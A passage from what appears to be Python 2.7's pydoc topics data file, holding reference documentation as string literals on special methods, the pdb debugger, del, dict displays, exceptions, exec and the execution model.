arguments are those ' 'passed to the\n' ' object constructor expression (the call to the class). ' 'The return\n' ' value of "__new__()" should be the new object instance ' '(usually an\n' ' instance of *cls*).\n' '\n' ' Typical implementations create a new instance of the ' 'class by\n' ' invoking the superclass\'s "__new__()" method using\n' ' "super(currentclass, cls).__new__(cls[, ...])" with ' 'appropriate\n' ' arguments and then modifying the newly-created instance ' 'as\n' ' necessary before returning it.\n' '\n' ' If "__new__()" returns an instance of *cls*, then the ' 'new\n' ' instance\'s "__init__()" method will be invoked like\n' ' "__init__(self[, ...])", where *self* is the new ' 'instance and the\n' ' remaining arguments are the same as were passed to ' '"__new__()".\n' '\n' ' If "__new__()" does not return an instance of *cls*, ' 'then the new\n' ' instance\'s "__init__()" method will not be invoked.\n' '\n' ' "__new__()" is intended mainly to allow subclasses of ' 'immutable\n' ' types (like int, str, or tuple) to customize instance ' 'creation. It\n' ' is also commonly overridden in custom metaclasses in ' 'order to\n' ' customize class creation.\n' '\n' 'object.__init__(self[, ...])\n' '\n' ' Called after the instance has been created (by ' '"__new__()"), but\n' ' before it is returned to the caller. The arguments are ' 'those\n' ' passed to the class constructor expression. If a base ' 'class has an\n' ' "__init__()" method, the derived class\'s "__init__()" ' 'method, if\n' ' any, must explicitly call it to ensure proper ' 'initialization of the\n' ' base class part of the instance; for example:\n' ' "BaseClass.__init__(self, [args...])".\n' '\n' ' Because "__new__()" and "__init__()" work together in ' 'constructing\n' ' objects ("__new__()" to create it, and "__init__()" to ' 'customise\n' ' it), no non-"None" value may be returned by ' '"__init__()"; doing so\n' ' will cause a "TypeError" to be raised at runtime.\n' '\n' 'object.__del__(self)\n' '\n' ' Called when the instance is about to be destroyed. This ' 'is also\n' ' called a destructor. If a base class has a "__del__()" ' 'method, the\n' ' derived class\'s "__del__()" method, if any, must ' 'explicitly call it\n' ' to ensure proper deletion of the base class part of the ' 'instance.\n' ' Note that it is possible (though not recommended!) for ' 'the\n' ' "__del__()" method to postpone destruction of the ' 'instance by\n' ' creating a new reference to it. It may then be called ' 'at a later\n' ' time when this new reference is deleted. It is not ' 'guaranteed that\n' ' "__del__()" methods are called for objects that still ' 'exist when\n' ' the interpreter exits.\n' '\n' ' Note: "del x" doesn\'t directly call "x.__del__()" --- ' 'the former\n' ' decrements the reference count for "x" by one, and the ' 'latter is\n' ' only called when "x"\'s reference count reaches zero. ' 'Some common\n' ' situations that may prevent the reference count of an ' 'object from\n' ' going to zero include: circular references between ' 'objects (e.g.,\n' ' a doubly-linked list or a tree data structure with ' 'parent and\n' ' child pointers); a reference to the object on the ' 'stack frame of\n' ' a function that caught an exception (the traceback ' 'stored in\n' ' "sys.exc_traceback" keeps the stack frame alive); or a ' 'reference\n' ' to the object on the stack frame that raised an ' 'unhandled\n' ' exception in interactive mode (the traceback stored ' 'in\n' ' "sys.last_traceback" keeps the stack frame alive). ' 'The first\n' ' situation can only be remedied by explicitly breaking ' 'the cycles;\n' ' the latter two situations can be resolved by storing ' '"None" in\n' ' "sys.exc_traceback" or "sys.last_traceback". Circular ' 'references\n' ' which are garbage are detected when the option cycle ' 'detector is\n' " enabled (it's on by default), but can only be cleaned " 'up if there\n' ' are no Python-level "__del__()" methods involved. ' 'Refer to the\n' ' documentation for the "gc" module for more information ' 'about how\n' ' "__del__()" methods are handled by the cycle ' 'detector,\n' ' particularly the description of the "garbage" value.\n' '\n' ' Warning: Due to the precarious circumstances under ' 'which\n' ' "__del__()" methods are invoked, exceptions that occur ' 'during\n' ' their execution are ignored, and a warning is printed ' 'to\n' ' "sys.stderr" instead. Also, when "__del__()" is ' 'invoked in\n' ' response to a module being deleted (e.g., when ' 'execution of the\n' ' program is done), other globals referenced by the ' '"__del__()"\n' ' method may already have been deleted or in the process ' 'of being\n' ' torn down (e.g. the import machinery shutting down). ' 'For this\n' ' reason, "__del__()" methods should do the absolute ' 'minimum needed\n' ' to maintain external invariants. Starting with ' 'version 1.5,\n' ' Python guarantees that globals whose name begins with ' 'a single\n' ' underscore are deleted from their module before other ' 'globals are\n' ' deleted; if no other references to such globals exist, ' 'this may\n' ' help in assuring that imported modules are still ' 'available at the\n' ' time when the "__del__()" method is called.\n' '\n' ' See also the "-R" command-line option.\n' '\n' 'object.__repr__(self)\n' '\n' ' Called by the "repr()" built-in function and by string ' 'conversions\n' ' (reverse quotes) to compute the "official" string ' 'representation of\n' ' an object. If at all possible, this should look like a ' 'valid\n' ' Python expression that could be used to recreate an ' 'object with the\n' ' same value (given an appropriate environment). If this ' 'is not\n' ' possible, a string of the form "<...some useful ' 'description...>"\n' ' should be returned. The return value must be a string ' 'object. If a\n' ' class defines "__repr__()" but not "__str__()", then ' '"__repr__()"\n' ' is also used when an "informal" string representation of ' 'instances\n' ' of that class is required.\n' '\n' ' This is typically used for debugging, so it is important ' 'that the\n' ' representation is information-rich and unambiguous.\n' '\n' 'object.__str__(self)\n' '\n' ' Called by the "str()" built-in function and by the ' '"print"\n' ' statement to compute the "informal" string ' 'representation of an\n' ' object. This differs from "__repr__()" in that it does ' 'not have to\n' ' be a valid Python expression: a more convenient or ' 'concise\n' ' representation may be used instead. The return value ' 'must be a\n' ' string object.\n' '\n' 'object.__lt__(self, other)\n' 'object.__le__(self, other)\n' 'object.__eq__(self, other)\n' 'object.__ne__(self, other)\n' 'object.__gt__(self, other)\n' 'object.__ge__(self, other)\n' '\n' ' New in version 2.1.\n' '\n' ' These are the so-called "rich comparison" methods, and ' 'are called\n' ' for comparison operators in preference to "__cmp__()" ' 'below. The\n' ' correspondence between operator symbols and method names ' 'is as\n' ' follows: "x<y" calls "x.__lt__(y)", "x<=y" calls ' '"x.__le__(y)",\n' ' "x==y" calls "x.__eq__(y)", "x!=y" and "x<>y" call ' '"x.__ne__(y)",\n' ' "x>y" calls "x.__gt__(y)", and "x>=y" calls ' '"x.__ge__(y)".\n' '\n' ' A rich comparison method may return the singleton ' '"NotImplemented"\n' ' if it does not implement the operation for a given pair ' 'of\n' ' arguments. By convention, "False" and "True" are ' 'returned for a\n' ' successful comparison. However, these methods can return ' 'any value,\n' ' so if the comparison operator is used in a Boolean ' 'context (e.g.,\n' ' in the condition of an "if" statement), Python will call ' '"bool()"\n' ' on the value to determine if the result is true or ' 'false.\n' '\n' ' There are no implied relationships among the comparison ' 'operators.\n' ' The truth of "x==y" does not imply that "x!=y" is ' 'false.\n' ' Accordingly, when defining "__eq__()", one should also ' 'define\n' ' "__ne__()" so that the operators will behave as ' 'expected. See the\n' ' paragraph on "__hash__()" for some important notes on ' 'creating\n' ' *hashable* objects which support custom comparison ' 'operations and\n' ' are usable as dictionary keys.\n' '\n' ' There are no swapped-argument versions of these methods ' '(to be used\n' ' when the left argument does not support the operation ' 'but the right\n' ' argument does); rather, "__lt__()" and "__gt__()" are ' "each other's\n" ' reflection, "__le__()" and "__ge__()" are each other\'s ' 'reflection,\n' ' and "__eq__()" and "__ne__()" are their own reflection.\n' '\n' ' Arguments to rich comparison methods are never coerced.\n' '\n' ' To automatically generate ordering operations from a ' 'single root\n' ' operation, see "functools.total_ordering()".\n' '\n' 'object.__cmp__(self, other)\n' '\n' ' Called by comparison operations if rich comparison (see ' 'above) is\n' ' not defined. Should return a negative integer if "self ' '< other",\n' ' zero if "self == other", a positive integer if "self > ' 'other". If\n' ' no "__cmp__()", "__eq__()" or "__ne__()" operation is ' 'defined,\n' ' class instances are compared by object identity ' '("address"). See\n' ' also the description of "__hash__()" for some important ' 'notes on\n' ' creating *hashable* objects which support custom ' 'comparison\n' ' operations and are usable as dictionary keys. (Note: ' 'the\n' ' restriction that exceptions are not propagated by ' '"__cmp__()" has\n' ' been removed since Python 1.5.)\n' '\n' 'object.__rcmp__(self, other)\n' '\n' ' Changed in version 2.1: No longer supported.\n' '\n' 'object.__hash__(self)\n' '\n' ' Called by built-in function "hash()" and for operations ' 'on members\n' ' of hashed collections including "set", "frozenset", and ' '"dict".\n' ' "__hash__()" should return an integer. The only ' 'required property\n' ' is that objects which compare equal have the same hash ' 'value; it is\n' ' advised to somehow mix together (e.g. using exclusive ' 'or) the hash\n' ' values for the components of the object that also play a ' 'part in\n' ' comparison of objects.\n' '\n' ' If a class does not define a "__cmp__()" or "__eq__()" ' 'method it\n' ' should not define a "__hash__()" operation either; if it ' 'defines\n' ' "__cmp__()" or "__eq__()" but not "__hash__()", its ' 'instances will\n' ' not be usable in hashed collections. If a class defines ' 'mutable\n' ' objects and implements a "__cmp__()" or "__eq__()" ' 'method, it\n' ' should not implement "__hash__()", since hashable ' 'collection\n' " implementations require that a object's hash value is " 'immutable (if\n' " the object's hash value changes, it will be in the wrong " 'hash\n' ' bucket).\n' '\n' ' User-defined classes have "__cmp__()" and "__hash__()" ' 'methods by\n' ' default; with them, all objects compare unequal (except ' 'with\n' ' themselves) and "x.__hash__()" returns a result derived ' 'from\n' ' "id(x)".\n' '\n' ' Classes which inherit a "__hash__()" method from a ' 'parent class but\n' ' change the meaning of "__cmp__()" or "__eq__()" such ' 'that the hash\n' ' value returned is no longer appropriate (e.g. by ' 'switching to a\n' ' value-based concept of equality instead of the default ' 'identity\n' ' based equality) can explicitly flag themselves as being ' 'unhashable\n' ' by setting "__hash__ = None" in the class definition. ' 'Doing so\n' ' means that not only will instances of the class raise ' 'an\n' ' appropriate "TypeError" when a program attempts to ' 'retrieve their\n' ' hash value, but they will also be correctly identified ' 'as\n' ' unhashable when checking "isinstance(obj, ' 'collections.Hashable)"\n' ' (unlike classes which define their own "__hash__()" to ' 'explicitly\n' ' raise "TypeError").\n' '\n' ' Changed in version 2.5: "__hash__()" may now also return ' 'a long\n' ' integer object; the 32-bit integer is then derived from ' 'the hash of\n' ' that object.\n' '\n' ' Changed in version 2.6: "__hash__" may now be set to ' '"None" to\n' ' explicitly flag instances of a class as unhashable.\n' '\n' 'object.__nonzero__(self)\n' '\n' ' Called to implement truth value testing and the built-in ' 'operation\n' ' "bool()"; should return "False" or "True", or their ' 'integer\n' ' equivalents "0" or "1". When this method is not ' 'defined,\n' ' "__len__()" is called, if it is defined, and the object ' 'is\n' ' considered true if its result is nonzero. If a class ' 'defines\n' ' neither "__len__()" nor "__nonzero__()", all its ' 'instances are\n' ' considered true.\n' '\n' 'object.__unicode__(self)\n' '\n' ' Called to implement "unicode()" built-in; should return ' 'a Unicode\n' ' object. When this method is not defined, string ' 'conversion is\n' ' attempted, and the result of string conversion is ' 'converted to\n' ' Unicode using the system default encoding.\n', 'debugger': '\n' '"pdb" --- The Python Debugger\n' '*****************************\n' '\n' '**Source code:** Lib/pdb.py\n' '\n' '======================================================================\n' '\n' 'The module "pdb" defines an interactive source code debugger ' 'for\n' 'Python programs. It supports setting (conditional) breakpoints ' 'and\n' 'single stepping at the source line level, inspection of stack ' 'frames,\n' 'source code listing, and evaluation of arbitrary Python code in ' 'the\n' 'context of any stack frame. It also supports post-mortem ' 'debugging\n' 'and can be called under program control.\n' '\n' 'The debugger is extensible --- it is actually defined as the ' 'class\n' '"Pdb". This is currently undocumented but easily understood by ' 'reading\n' 'the source. The extension interface uses the modules "bdb" and ' '"cmd".\n' '\n' 'The debugger\'s prompt is "(Pdb)". Typical usage to run a ' 'program under\n' 'control of the debugger is:\n' '\n' ' >>> import pdb\n' ' >>> import mymodule\n' " >>> pdb.run('mymodule.test()')\n" ' > <string>(0)?()\n' ' (Pdb) continue\n' ' > <string>(1)?()\n' ' (Pdb) continue\n' " NameError: 'spam'\n" ' > <string>(1)?()\n' ' (Pdb)\n' '\n' '"pdb.py" can also be invoked as a script to debug other ' 'scripts. For\n' 'example:\n' '\n' ' python -m pdb myscript.py\n' '\n' 'When invoked as a script, pdb will automatically enter ' 'post-mortem\n' 'debugging if the program being debugged exits abnormally. After ' 'post-\n' 'mortem debugging (or after normal exit of the program), pdb ' 'will\n' "restart the program. Automatic restarting preserves pdb's state " '(such\n' 'as breakpoints) and in most cases is more useful than quitting ' 'the\n' "debugger upon program's exit.\n" '\n' 'New in version 2.4: Restarting post-mortem behavior added.\n' '\n' 'The typical usage to break into the debugger from a running ' 'program is\n' 'to insert\n' '\n' ' import pdb; pdb.set_trace()\n' '\n' 'at the location you want to break into the debugger. You can ' 'then\n' 'step through the code following this statement, and continue ' 'running\n' 'without the debugger using the "c" command.\n' '\n' 'The typical usage to inspect a crashed program is:\n' '\n' ' >>> import pdb\n' ' >>> import mymodule\n' ' >>> mymodule.test()\n' ' Traceback (most recent call last):\n' ' File "<stdin>", line 1, in ?\n' ' File "./mymodule.py", line 4, in test\n' ' test2()\n' ' File "./mymodule.py", line 3, in test2\n' ' print spam\n' ' NameError: spam\n' ' >>> pdb.pm()\n' ' > ./mymodule.py(3)test2()\n' ' -> print spam\n' ' (Pdb)\n' '\n' 'The module defines the following functions; each enters the ' 'debugger\n' 'in a slightly different way:\n' '\n' 'pdb.run(statement[, globals[, locals]])\n' '\n' ' Execute the *statement* (given as a string) under debugger ' 'control.\n' ' The debugger prompt appears before any code is executed; you ' 'can\n' ' set breakpoints and type "continue", or you can step through ' 'the\n' ' statement using "step" or "next" (all these commands are ' 'explained\n' ' below). The optional *globals* and *locals* arguments ' 'specify the\n' ' environment in which the code is executed; by default the\n' ' dictionary of the module "__main__" is used. (See the ' 'explanation\n' ' of the "exec" statement or the "eval()" built-in function.)\n' '\n' 'pdb.runeval(expression[, globals[, locals]])\n' '\n' ' Evaluate the *expression* (given as a string) under debugger\n' ' control. When "runeval()" returns, it returns the value of ' 'the\n' ' expression. Otherwise this function is similar to "run()".\n' '\n' 'pdb.runcall(function[, argument, ...])\n' '\n' ' Call the *function* (a function or method object, not a ' 'string)\n' ' with the given arguments. When "runcall()" returns, it ' 'returns\n' ' whatever the function call returned. The debugger prompt ' 'appears\n' ' as soon as the function is entered.\n' '\n' 'pdb.set_trace()\n' '\n' ' Enter the debugger at the calling stack frame. This is ' 'useful to\n' ' hard-code a breakpoint at a given point in a program, even if ' 'the\n' ' code is not otherwise being debugged (e.g. when an assertion\n' ' fails).\n' '\n' 'pdb.post_mortem([traceback])\n' '\n' ' Enter post-mortem debugging of the given *traceback* object. ' 'If no\n' ' *traceback* is given, it uses the one of the exception that ' 'is\n' ' currently being handled (an exception must be being handled ' 'if the\n' ' default is to be used).\n' '\n' 'pdb.pm()\n' '\n' ' Enter post-mortem debugging of the traceback found in\n' ' "sys.last_traceback".\n' '\n' 'The "run*" functions and "set_trace()" are aliases for ' 'instantiating\n' 'the "Pdb" class and calling the method of the same name. If you ' 'want\n' 'to access further features, you have to do this yourself:\n' '\n' "class pdb.Pdb(completekey='tab', stdin=None, stdout=None, " 'skip=None)\n' '\n' ' "Pdb" is the debugger class.\n' '\n' ' The *completekey*, *stdin* and *stdout* arguments are passed ' 'to the\n' ' underlying "cmd.Cmd" class; see the description there.\n' '\n' ' The *skip* argument, if given, must be an iterable of ' 'glob-style\n' ' module name patterns. The debugger will not step into frames ' 'that\n' ' originate in a module that matches one of these patterns. ' '[1]\n' '\n' ' Example call to enable tracing with *skip*:\n' '\n' " import pdb; pdb.Pdb(skip=['django.*']).set_trace()\n" '\n' ' New in version 2.7: The *skip* argument.\n' '\n' ' run(statement[, globals[, locals]])\n' ' runeval(expression[, globals[, locals]])\n' ' runcall(function[, argument, ...])\n' ' set_trace()\n' '\n' ' See the documentation for the functions explained above.\n', 'del': '\n' 'The "del" statement\n' '*******************\n' '\n' ' del_stmt ::= "del" target_list\n' '\n' 'Deletion is recursively defined very similar to the way assignment ' 'is\n' 'defined. Rather than spelling it out in full details, here are some\n' 'hints.\n' '\n' 'Deletion of a target list recursively deletes each target, from left\n' 'to right.\n' '\n' 'Deletion of a name removes the binding of that name from the local ' 'or\n' 'global namespace, depending on whether the name occurs in a "global"\n' 'statement in the same code block. If the name is unbound, a\n' '"NameError" exception will be raised.\n' '\n' 'It is illegal to delete a name from the local namespace if it occurs\n' 'as a free variable in a nested block.\n' '\n' 'Deletion of attribute references, subscriptions and slicings is ' 'passed\n' 'to the primary object involved; deletion of a slicing is in general\n' 'equivalent to assignment of an empty slice of the right type (but ' 'even\n' 'this is determined by the sliced object).\n', 'dict': '\n' 'Dictionary displays\n' '*******************\n' '\n' 'A dictionary display is a possibly empty series of key/datum pairs\n' 'enclosed in curly braces:\n' '\n' ' dict_display ::= "{" [key_datum_list | dict_comprehension] ' '"}"\n' ' key_datum_list ::= key_datum ("," key_datum)* [","]\n' ' key_datum ::= expression ":" expression\n' ' dict_comprehension ::= expression ":" expression comp_for\n' '\n' 'A dictionary display yields a new dictionary object.\n' '\n' 'If a comma-separated sequence of key/datum pairs is given, they are\n' 'evaluated from left to right to define the entries of the ' 'dictionary:\n' 'each key object is used as a key into the dictionary to store the\n' 'corresponding datum. This means that you can specify the same key\n' "multiple times in the key/datum list, and the final dictionary's " 'value\n' 'for that key will be the last one given.\n' '\n' 'A dict comprehension, in contrast to list and set comprehensions,\n' 'needs two expressions separated with a colon followed by the usual\n' '"for" and "if" clauses. When the comprehension is run, the ' 'resulting\n' 'key and value elements are inserted in the new dictionary in the ' 'order\n' 'they are produced.\n' '\n' 'Restrictions on the types of the key values are listed earlier in\n' 'section The standard type hierarchy. (To summarize, the key type\n' 'should be *hashable*, which excludes all mutable objects.) Clashes\n' 'between duplicate keys are not detected; the last datum (textually\n' 'rightmost in the display) stored for a given key value prevails.\n', 'dynamic-features': '\n' 'Interaction with dynamic features\n' '*********************************\n' '\n' 'There are several cases where Python statements are ' 'illegal when used\n' 'in conjunction with nested scopes that contain free ' 'variables.\n' '\n' 'If a variable is referenced in an enclosing scope, it is ' 'illegal to\n' 'delete the name. An error will be reported at compile ' 'time.\n' '\n' 'If the wild card form of import --- "import *" --- is ' 'used in a\n' 'function and the function contains or is a nested block ' 'with free\n' 'variables, the compiler will raise a "SyntaxError".\n' '\n' 'If "exec" is used in a function and the function ' 'contains or is a\n' 'nested block with free variables, the compiler will ' 'raise a\n' '"SyntaxError" unless the exec explicitly specifies the ' 'local namespace\n' 'for the "exec". (In other words, "exec obj" would be ' 'illegal, but\n' '"exec obj in ns" would be legal.)\n' '\n' 'The "eval()", "execfile()", and "input()" functions and ' 'the "exec"\n' 'statement do not have access to the full environment for ' 'resolving\n' 'names. Names may be resolved in the local and global ' 'namespaces of\n' 'the caller. Free variables are not resolved in the ' 'nearest enclosing\n' 'namespace, but in the global namespace. [1] The "exec" ' 'statement and\n' 'the "eval()" and "execfile()" functions have optional ' 'arguments to\n' 'override the global and local namespace. If only one ' 'namespace is\n' 'specified, it is used for both.\n', 'else': '\n' 'The "if" statement\n' '******************\n' '\n' 'The "if" statement is used for conditional execution:\n' '\n' ' if_stmt ::= "if" expression ":" suite\n' ' ( "elif" expression ":" suite )*\n' ' ["else" ":" suite]\n' '\n' 'It selects exactly one of the suites by evaluating the expressions ' 'one\n' 'by one until one is found to be true (see section Boolean ' 'operations\n' 'for the definition of true and false); then that suite is executed\n' '(and no other part of the "if" statement is executed or evaluated).\n' 'If all expressions are false, the suite of the "else" clause, if\n' 'present, is executed.\n', 'exceptions': '\n' 'Exceptions\n' '**********\n' '\n' 'Exceptions are a means of breaking out of the normal flow of ' 'control\n' 'of a code block in order to handle errors or other ' 'exceptional\n' 'conditions. An exception is *raised* at the point where the ' 'error is\n' 'detected; it may be *handled* by the surrounding code block or ' 'by any\n' 'code block that directly or indirectly invoked the code block ' 'where\n' 'the error occurred.\n' '\n' 'The Python interpreter raises an exception when it detects a ' 'run-time\n' 'error (such as division by zero). A Python program can also\n' 'explicitly raise an exception with the "raise" statement. ' 'Exception\n' 'handlers are specified with the "try" ... "except" statement. ' 'The\n' '"finally" clause of such a statement can be used to specify ' 'cleanup\n' 'code which does not handle the exception, but is executed ' 'whether an\n' 'exception occurred or not in the preceding code.\n' '\n' 'Python uses the "termination" model of error handling: an ' 'exception\n' 'handler can find out what happened and continue execution at ' 'an outer\n' 'level, but it cannot repair the cause of the error and retry ' 'the\n' 'failing operation (except by re-entering the offending piece ' 'of code\n' 'from the top).\n' '\n' 'When an exception is not handled at all, the interpreter ' 'terminates\n' 'execution of the program, or returns to its interactive main ' 'loop. In\n' 'either case, it prints a stack backtrace, except when the ' 'exception is\n' '"SystemExit".\n' '\n' 'Exceptions are identified by class instances. The "except" ' 'clause is\n' 'selected depending on the class of the instance: it must ' 'reference the\n' 'class of the instance or a base class thereof. The instance ' 'can be\n' 'received by the handler and can carry additional information ' 'about the\n' 'exceptional condition.\n' '\n' 'Exceptions can also be identified by strings, in which case ' 'the\n' '"except" clause is selected by object identity. An arbitrary ' 'value\n' 'can be raised along with the identifying string which can be ' 'passed to\n' 'the handler.\n' '\n' 'Note: Messages to exceptions are not part of the Python API. ' 'Their\n' ' contents may change from one version of Python to the next ' 'without\n' ' warning and should not be relied on by code which will run ' 'under\n' ' multiple versions of the interpreter.\n' '\n' 'See also the description of the "try" statement in section The ' 'try\n' 'statement and "raise" statement in section The raise ' 'statement.\n' '\n' '-[ Footnotes ]-\n' '\n' '[1] This limitation occurs because the code that is executed ' 'by\n' ' these operations is not available at the time the module ' 'is\n' ' compiled.\n', 'exec': '\n' 'The "exec" statement\n' '********************\n' '\n' ' exec_stmt ::= "exec" or_expr ["in" expression ["," expression]]\n' '\n' 'This statement supports dynamic execution of Python code. The ' 'first\n' 'expression should evaluate to either a Unicode string, a *Latin-1*\n' 'encoded string, an open file object, a code object, or a tuple. If ' 'it\n' 'is a string, the string is parsed as a suite of Python statements\n' 'which is then executed (unless a syntax error occurs). [1] If it is ' 'an\n' 'open file, the file is parsed until EOF and executed. If it is a ' 'code\n' 'object, it is simply executed. For the interpretation of a tuple, ' 'see\n' "below. In all cases, the code that's executed is expected to be " 'valid\n' 'as file input (see section File input). Be aware that the "return"\n' 'and "yield" statements may not be used outside of function ' 'definitions\n' 'even within the context of code passed to the "exec" statement.\n' '\n' 'In all cases, if the optional parts are omitted, the code is ' 'executed\n' 'in the current scope. If only the first expression after "in" is\n' 'specified, it should be a dictionary, which will be used for both ' 'the\n' 'global and the local variables. If two expressions are given, they\n' 'are used for the global and local variables, respectively. If\n' 'provided, *locals* can be any mapping object. Remember that at ' 'module\n' 'level, globals and locals are the same dictionary. If two separate\n' 'objects are given as *globals* and *locals*, the code will be ' 'executed\n' 'as if it were embedded in a class definition.\n' '\n' 'The first expression may also be a tuple of length 2 or 3. In this\n' 'case, the optional parts must be omitted. The form "exec(expr,\n' 'globals)" is equivalent to "exec expr in globals", while the form\n' '"exec(expr, globals, locals)" is equivalent to "exec expr in ' 'globals,\n' 'locals". The tuple form of "exec" provides compatibility with ' 'Python\n' '3, where "exec" is a function rather than a statement.\n' '\n' 'Changed in version 2.4: Formerly, *locals* was required to be a\n' 'dictionary.\n' '\n' 'As a side effect, an implementation may insert additional keys into\n' 'the dictionaries given besides those corresponding to variable ' 'names\n' 'set by the executed code. For example, the current implementation ' 'may\n' 'add a reference to the dictionary of the built-in module ' '"__builtin__"\n' 'under the key "__builtins__" (!).\n' '\n' "**Programmer's hints:** dynamic evaluation of expressions is " 'supported\n' 'by the built-in function "eval()". The built-in functions ' '"globals()"\n' 'and "locals()" return the current global and local dictionary,\n' 'respectively, which may be useful to pass around for use by "exec".\n' '\n' '-[ Footnotes ]-\n' '\n' '[1] Note that the parser only accepts the Unix-style end of line\n' ' convention. If you are reading the code from a file, make sure ' 'to\n' ' use *universal newlines* mode to convert Windows or Mac-style\n' ' newlines.\n', 'execmodel': '\n' 'Execution model\n' '***************\n' '\n' '\n' 'Naming and binding\n' '==================\n' '\n' '*Names* refer to objects. Names are introduced by name ' 'binding\n' 'operations. Each occurrence of a name in the program text ' 'refers to\n' 'the *binding* of that name established in the innermost ' 'function block\n' 'containing the use.\n' '\n' 'A *block* is a piece of Python program text that is executed as ' 'a\n' 'unit. The following are blocks: a module, a function body, and ' 'a class\n' 'definition. Each command typed interactively is a block. A ' 'script\n' 'file (a file given as standard input to the interpreter or ' 'specified\n' 'on the interpreter command line the first argument) is a code ' 'block.\n' 'A script command (a command specified on the interpreter ' 'command line\n' "with the '**-c**' option) is a code block. The file read by " 'the\n' 'built-in function "execfile()" is a code block. The string ' 'argument\n' 'passed to the built-in function "eval()" and to the "exec" ' 'statement\n' 'is a code block. The expression read and evaluated by the ' 'built-in\n' 'function "input()" is a code block.\n' '\n' 'A code block is executed in an *execution frame*. A frame ' 'contains\n' 'some administrative information (used for debugging) and ' 'determines\n' "where and how execution continues after the code block's " 'execution has\n' 'completed.\n' '\n' 'A *scope* defines the visibility of a name within a block. If ' 'a local\n' 'variable is defined in a block, its scope includes that block. ' 'If the\n' 'definition occurs in a function block, the scope extends to any ' 'blocks\n' 'contained within the defining one, unless a contained block ' 'introduces\n' 'a different binding for the name. The scope of names defined ' 'in a\n' 'class block is limited to the class block; it does not extend ' 'to the\n' 'code blocks of methods -- this includes generator expressions ' 'since\n' 'they are implemented using a function scope. This means that ' 'the\n' 'following will fail:\n' '\n' ' class A:\n' ' a = 42\n' ' b = list(a + i for i in range(10))\n' '\n' 'When a name is used in a code block, it is resolved using the ' 'nearest\n' 'enclosing scope. The set of all such scopes visible to a code ' 'block\n' "is called the block's *environment*.\n" '\n' 'If a name is bound in a block, it is a local variable of that ' 'block.\n' 'If a name is bound at the module level, it is a global ' 'variable. (The\n' 'variables of the module code block are local and global.) If ' 'a\n' 'variable is used in a code block but not defined there, it is a ' '*free\n' 'variable*.\n' '\n' 'When a name is not found at all, a "NameError" exception is ' 'raised.\n' 'If the name refers to a local variable that has not been bound, ' 'a\n' '"UnboundLocalError" exception is raised. "UnboundLocalError" ' 'is a\n' 'subclass of "NameError".\n' '\n' 'The following constructs bind names: formal parameters to ' 'functions,\n' '"import" statements, class and function definitions (these bind ' 'the\n' 'class or function name in the defining block), and targets that ' 'are\n' 'identifiers if occurring in an assignment, "for" loop header, ' 'in the\n' 'second position of an "except" clause header or after "as" in a ' '"with"\n' 'statement. The "import" statement of the form "from ... import ' '*"\n' 'binds all names defined in the imported module, except those ' 'beginning\n' 'with an underscore. This form may only be used at the module ' 'level.\n' '\n' 'A target occurring in a "del" statement is also considered ' 'bound for\n' 'this purpose (though the actual semantics are to unbind the ' 'name). It\n' 'is illegal to unbind a name that is referenced by an enclosing ' 'scope;\n' 'the compiler will report a "SyntaxError".\n' '\n' 'Each assignment or import statement occurs within a block ' 'defined by a\n' 'class or function definition or at the module level (the ' 'top-level\n' 'code block).\n' '\n' 'If a name binding operation occurs anywhere within a code ' 'block, all\n' 'uses of the name within the block are treated as references to ' 'the\n' 'current block. This can lead to errors when a name is used ' 'within a\n' 'block before it is bound. This rule is subtle. Python lacks\n' 'declarations and allows name binding operations to occur ' 'anywhere\n' 'within a code block. The local variables of a code block can ' 'be\n' 'determined by scanning the entire text of the block for name ' 'binding\n' 'operations.\n' '\n' 'If the global statement occurs within a block, all uses of the ' 'name\n' 'specified in the statement refer to the binding of that name in ' 'the\n' 'top-level namespace. Names are resolved in the top-level ' 'namespace by\n' 'searching the global namespace, i.e. the namespace of the ' 'module\n' 'containing the code block, and the builtins namespace, the ' 'namespace\n' 'of the module "__builtin__". The global namespace is searched ' 'first.\n' 'If the name is not found there, the builtins namespace is ' 'searched.\n' 'The global statement must precede all uses of the name.\n' '\n' 'The builtins namespace associated with the execution of a code ' 'block\n' 'is actually found by looking up the name "__builtins__" in its ' 'global\n' 'namespace; this should be a dictionary or a module (in the ' 'latter case\n' "the module's dictionary is used). By default, when in the " '"__main__"\n' 'module, "__builtins__" is the built-in module "__builtin__" ' '(note: no\n' '\'s\'); when in any other module, "__builtins__" is an alias ' 'for the\n' 'dictionary of the "__builtin__" module itself. "__builtins__" ' 'can be\n' 'set to a user-created dictionary to create a weak form of ' 'restricted\n' 'execution.\n' '\n' '**CPython implementation detail:** Users should not touch\n' '"__builtins__"; it is strictly an implementation detail. ' 'Users\n' 'wanting to override values in the builtins namespace should ' '"import"\n' 'the "__builtin__" (no \'s\') module and modify its attributes\n' 'appropriately.\n' '\n' 'The namespace for a module is automatically created the first ' 'time a\n' 'module is imported. The main module for a script is always ' 'called\n' '"__main__".\n' '\n' 'The "global" statement has the same scope as a name binding ' 'operation\n' 'in the same block. If the nearest enclosing scope for a free ' 'variable\n' 'contains a global statement, the free variable is treated as a ' 'global.\n' '\n' 'A class definition is an executable statement that may use and ' 'define\n' 'names. These references follow the normal rules for name ' 'resolution.\n' 'The namespace of the class definition becomes the attribute ' 'dictionary\n' 'of the class. Names defined at the class scope are not visible ' 'in\n' 'methods.\n' '\n' '\n' 'Interaction with dynamic features\n' '---------------------------------\n' '\n' 'There are several cases where Python statements are illegal ' 'when used\n' 'in conjunction with nested scopes that contain free variables.\n' '\n' 'If a variable is referenced in an enclosing scope, it is ' 'illegal to\n' 'delete the name. An error will be reported at compile time.\n' '\n' 'If the wild card form of import --- "import *" --- is used in ' 'a\n' 'function and the function contains or is a nested block with ' 'free\n' 'variables, the compiler will raise a "SyntaxError".\n' '\n' 'If "exec" is used in a function and the function contains or is ' 'a\n' 'nested block with free variables, the compiler will raise a\n' '"SyntaxError" unless the exec explicitly specifies the local ' 'namespace\n' 'for the "exec". (In other words, "exec obj" would be illegal, ' 'but\n' '"exec obj in ns" would be legal.)\n' '\n' 'The "eval()", "execfile()", and "input()" functions and the ' '"exec"\n' 'statement do not have access to the full environment for ' 'resolving\n' 'names. Names may be resolved in the local and global ' 'namespaces of\n' 'the caller. Free variables are not resolved in the nearest ' 'enclosing\n' 'namespace, but in the global namespace. [1] The "exec" ' 'statement and\n' 'the "eval()" and "execfile()" functions have optional arguments ' 'to\n' 'override the global and local namespace. If only one namespace ' 'is\n' 'specified, it is used for both.\n' '\n' '\n' 'Exceptions\n' '==========\n' '\n' 'Exceptions are a means of breaking out of the normal flow of ' 'control\n' 'of a code block in order to handle errors or other exceptional\n' 'conditions. An 